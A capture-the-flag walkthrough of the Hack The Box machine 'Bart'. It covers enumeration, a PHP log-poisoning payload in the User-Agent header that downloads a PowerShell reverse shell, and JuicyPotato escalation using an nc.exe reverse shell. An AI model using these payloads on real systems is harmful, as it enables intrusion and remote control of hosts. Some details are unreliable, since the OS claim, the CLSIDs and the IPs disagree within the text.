Bart

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.81 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.93 scan initiated Mon Nov  7 11:36:41 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.81
Nmap scan report for 10.10.10.81
Host is up (0.060s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

# Nmap done at Mon Nov  7 11:37:08 2022 -- 1 IP address (1 host up) scanned in 26.68 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p80 10.10.10.81 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.93 scan initiated Mon Nov  7 11:38:02 2022 as: nmap -sCV -p80 -oN targeted 10.10.10.81
Nmap scan report for 10.10.10.81
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://forum.bart.htb/
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov  7 11:38:17 2022 -- 1 IP address (1 host up) scanned in 15.19 seconds

As we can see in the nmap report, the website on port 80 is doing a redirect to forum.bart.htb. Let's add that domain and bart.htb to the /etc/hosts file.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.81     forum.bart.htb bart.htb 

Let's take a look at the website.

At some point, we can see the team members.

At the source code, there is one more member which is commented. Let's get all the members name.

curl -s http://forum.bart.htb/ | grep "name"" | grep -oP ">.*?<" | tr -d "><"

Samantha Brown
Daniel Simmons
Robert Hilton
Harvey Potter

Now we have a potential list of users. Note that the website is on forum.bart.htb, but there may be other subdomains available.

gobuster dns -d bart.htb -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 200

• dns uses DNS subdomain enumeration mode.

• -d target domain.

• -w path to the wordlist.

• -t number of current threads, in this case 200 threads.

===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     bart.htb
[+] Threads:    200
[+] Timeout:    1s
[+] Wordlist:   /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
2022/11/07 16:09:50 Starting gobuster in DNS enumeration mode
===============================================================
Found: forum.bart.htb

Found: monitor.bart.htb

===============================================================
2022/11/07 16:10:16 Finished
===============================================================

Let's add the monitor.bart.htb subdomain name to the /etc/hosts file.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.81     forum.bart.htb bart.htb monitor.bart.htb

The site shows a login page.

If we try random credentials, we won't be able to log in.

But the Forgot password? button seems to indicate if the user is valid.

Exploitation

At this point, I tried to check if any of the found users were valid, and the harvey user seems to be valid.

If we try the user harvey, and his surname potter as the password, we'll be able to log in.

Inside the Server Monitor application, we could see a server called Internal Chat.

The server runs on the internal-01.bart.htb subdomain.

Let's add the new subdomain to the /etc/hosts file

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.81     forum.bart.htb bart.htb monitor.bart.htb internal-01.bart.htb

Then, we'll see that the new website contains another login form.

But the previous credentials are not valid in this case.

As the Simple Chat application is open source, we can insect it's source code from the Github repository. In the source code, we can see that there is one file called register.php, but we are no able to access it.

curl http://internal-01.bart.htb/simple_chat/register.php -L

• -L follow redirects.

The page cannot be displayed because an internal server error has occurred.

However, we can try to create a new user by sending a POST request to register.php with the uname and passwd parameters.

curl http://internal-01.bart.htb/simple_chat/register.php -X POST -d "uname=alfa8sa&passwd=alfa8sa123"

Now, we could log in as the new user we just created.

We will see a chat, where bobby is saying not to place development code there.

So, if we take a look at the source code, we'll see some JavaScript code which sends a GET request to some interesting URL.

<script>

    function saveChat() {

    	// create a serialized object and send to log_chat.php. Once done hte XHR request, alert "Done"

    var xhr = new XMLHttpRequest();

    xhr.onreadystatechange = function() {

        if (xhr.readyState == XMLHttpRequest.DONE) {

	    alert(xhr.responseText);

	}

    }

    xhr.open('GET', 'http://internal-01.bart.htb/log/log.php?filename=log.txt&username=harvey', true);

    xhr.send(null);

    alert("Done");

    }

</script>

If we send a GET request to that URL, we'll get a 1 as a response.

curl "http://internal-01.bart.htb/log/log.php?filename=log.txt&username=harvey"

1

Note the filename parameter is set to log.txt. If we try to read the file, we'll see log entries indicating the user and the User-Agent.

curl "http://internal-01.bart.htb/log/log.txt"

[2018-02-21 22:35:17] - harvey - Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
[2022-11-07 18:45:31] - harvey - curl/7.85.0
[2022-11-07 18:45:34] - harvey - curl/7.85.0

We could try to change the filename parameter to one that doesn't exist, and has the .php extension, so we can inject PHP code, and eventually run commands on the system. In this case, I will create the pwn.php file, and set the User-Agent as a command which will download a file from my system called rv.ps1, which will send us a reverse shell.

curl "http://internal-01.bart.htb/log/log.php?filename=pwn.php&username=harvey" -H "User-Agent: <?php system('powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8/rv.ps1')');?>"

First, download the Invoke-PowerShellTcp.ps1 file from Nishang, and add the following function at the end of the script. I will rename the file to rv.ps1.

mv Invoke-PowerShellTcp.ps1 rv.ps1

nano rv.ps1

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 4444

Now, set a netcat listener on port 4444 with rlwrap.

rlwrap nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

And set a simple HTTP server with python on the current directory.

python -m http.server 80

If now we send s GET request to the pwn.php file, the payload will be executed and we should catch a reverse shell on our netcat listener.

curl "http://internal-01.bart.htb/log/pwn.php"

Listening on 0.0.0.0 4444
Connection received on 10.10.10.81 49673
Windows PowerShell running as user BART$ on BART
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\inetpub\wwwroot\internal-01\log>whoami
nt authority\iusr

Privilege Escalation

Let's see what privileges the user nt authority\iusr has.

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled

If a user has the SeImpersonatePrivilege, the first thing that comes to mind is JuicyPotato.

JuicyPotato is a local privilege escalation tool for Windows, which uses COM objects for privilege escalation. It is needed that SeImpersonate or SeAssignPrimaryToken are enabled.

https://github.com/ohpe/juicy-potato

To escalate privileges, we'll have to transfer JuicyPotato.exe to the victim machine. Let's set a python HTTP server on the directory where we have the JuicyPotato binary.

python -m SimpleHTTPServer

And download the binaries from the desktop folder of the nt authority\iusr user.

certutil.exe -f -urlcache -split http://10.10.14.8:8000/JuicyPotato.exe JuicyPotato.exe

Before executing the JuicyPotato.exe binary, let's set another netcat listener on port 5555 to catch a reverse shell as the NT AUTHORITY\SYSTEM user.

nc -lvnp 5555

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

And let's set an SMB server on the directory where the nc.exe binary is located.

impacket-smbserver smbFolder $(pwd) -smb2support

Finally, let's run the JuicyPotato binary to get a shell as the NT AUTHORITY\SYSTEM user.

.\JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c \\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.8 5555"

• -t createprocess call.

• -l COM server listen port.

• -p program to launch.

• -a specify command arguments.

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
COM -> recv failed with error: 10038

But we get an error. This is happening because JuicyPotato is using the default CLSID. If check for system information, we'll see the machine is a Microsoft Windows Server 2008 R2 Datacenter.

systeminfo

Host Name:                 BART
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.15063 N/A Build 15063
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00330-80110-20834-AA869
Original Install Date:     24/09/2017, 19:35:51
System Boot Time:          07/11/2022, 16:02:27
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
                           [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-gb;English (United Kingdom)
Input Locale:              en-gb;English (United Kingdom)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 3,003 MB
Virtual Memory: Max Size:  5,567 MB
Virtual Memory: Available: 4,451 MB
Virtual Memory: In Use:    1,116 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.81
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

So we have to change the CLSID to a valid one. You can check a Windows 10 Pro CLSID list here.

The Class ID, or CLSID, is a serial number that represents a unique ID for any application component in Windows. In practice, this means all registry entries for an application component can usually be found under the registry key HKEY_CLASSES_ROOT\CLSID{CLSID value}.

If we change it for {C5D3C0E1-DC41-4F83-8BA8-CC0D46BCCDE3}, we should get the reverse shell. Then all we have to do is reap the harvest and take both the user flag and the root flag.

.\JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c \10.10.14.8\smbFolder\nc.exe -e cmd 10.10.14.8 5555" -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}"

• -t createprocess call.

• -l COM server listen port.

• -p program to launch.

• -a specify command arguments.

• -c use CLSID.

Listening on 0.0.0.0 5555
Connection received on 10.10.10.81 49782
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>type \users\h.potter\desktop\user.txt
80f0378a52202e4dd1124561c95b64cb

C:\Windows\system32>type \users\administrator\desktop\root.txt
de8a53b5078c8b37fc29c1309d256a37